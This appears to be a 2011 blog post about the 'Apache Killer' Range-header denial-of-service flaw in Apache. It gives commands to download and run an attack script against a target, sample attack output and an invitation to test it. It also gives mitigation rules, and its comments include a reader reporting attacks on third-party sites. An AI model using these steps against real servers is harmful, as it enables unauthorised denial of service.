Categories
Penetration Testing Web Exploitation Tools

Apache Killer – Denial of Service Flaw in Apache WebServer

We were following a thread , it was related to apache flaw which was discovered by KingCope.

What is ‘Apache Killer’ Flaw?

It sends multiple GET requests with dozens of “Byte Ranges” that will eat up server’s memory. Byte Range helps browswer or downloading applications to download required parts of file. This helps reduce bandwidth usage. While this script sends dozen of unsorted components in request header to cause apache   server to malfunction.

It is DoS condition on Apache web Server. I performed a test with a script written by @KingCope and can confirm that it will eat up Server resource in seconds.

Although the patch isn’t available from apache.org yet, we are still waiting for an update from Apache.

When some one execute this attack on your server, it will eat up your 1 GB RAM in 10 seconds, your CPU load will hit 10 average load and our server will finally freeze. Test it out before Apache release the fix 😀

How to use ‘Apache Killer’ Exploit on Linux (BackTrack 5) :

before you use this tiny script, you have to install one perl extension using cpan utility.

cpan -i Parallel::ForkManager

Download perl script :
wget http://static.hackersgarage.com/killapache.pl.hackersgarage.com
mv killapache.pl.hackersgarage.com killapache.pl

Make it executable :
chmod u+x killapache.pl

Exploit your target :
perl killapache.pl example.com 50

Output :
host seems vuln
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp
ATTACKING example.com [using 50 forks]
:pPpPpppPpPPppPpppPp

Mitigation for Apache Killer Range bytes header flaw?

From Full Disclosure mailing list is as follows;
More mitigation techniques defined : http://mail-archives.apache.org/mod_mbox/httpd-announce/201108.mbox/browser

Option 1: (Apache 2.0 and 2.2)

# Drop the Range header when more than 5 ranges.
# CVE-2011-3192
SetEnvIf Range (,.*?){5,} bad-range=1
RequestHeader unset Range env=bad-range

# optional logging.
CustomLog logs/range-CVE-2011-3192.log common env=bad-range

Option 2: (Also for Apache 1.3)

# Reject request when more than 5 ranges in the Range: header.
# CVE-2011-3192
#
RewriteEngine on
RewriteCond %{HTTP:range} !(^bytes=[^,]+(,[^,]+){0,4}$|^$)
RewriteRule .* - [F]

Update 1 (26 Aug, 2011):

You can use mod_rewrite to mitigate this flaw

# Explicitly allow "range:0-" request from Flash uploaded client request
RewriteCond %{HTTP:range} ^bytes=0-$
RewriteRule .* - [L]

# @see http://marc.info/?l=apache-httpd-dev&m=131418828705324&w=2
RewriteCond %{HTTP:range} ^bytes=[^,]+(,[^,]+){0,4}$
RewriteRule .* - [F]

For Mod_Security ModSecurity 1.x users might do the trick – assuming they don’t really rely or use range request headers for anything.

# ApacheKiller - 2011 Flaw
SecFilterSelective HTTP_Range !(^$|^bytes=0-$)
SecFilterSelective HTTP_Request-Range !(^$|^bytes=0-$)

Supposed to say: We accept range headers only when
- "^$" empty value - or header not present
- value is "bytes=0-"

Update 2 : Apache Releases FIX
Complete release is available here.

If you are still unable to fix this flaw, you can contact me for FREE Consultancy

14 replies on “Apache Killer – Denial of Service Flaw in Apache WebServer”

Dear Khan

Thanks for your feedback. If is there anything we can help to mitigate this for you, feel free to contact us at tips at hackersgarage dot com.

just working in 2 virtuals machine, after that i tried to do it more than ten times in others websites running apache (old versions 2010) and no security and i always got “Host does not seem vulnerable”

: (

was this a problem?

root@bt:~/Desktop/apache# perl killapache.pl
Can’t locate Parallel/ForkManager.pm in @INC (@INC contains: /etc/perl /usr/local/lib/perl/5.10.1 /usr/local/share/perl/5.10.1 /usr/lib/perl5 /usr/share/perl5 /usr/lib/perl/5.10 /usr/share/perl/5.10 /usr/local/lib/site_perl .) at killapache.pl line 13.
BEGIN failed–compilation aborted at killapache.pl line 13.

what is solution?

Comments are closed.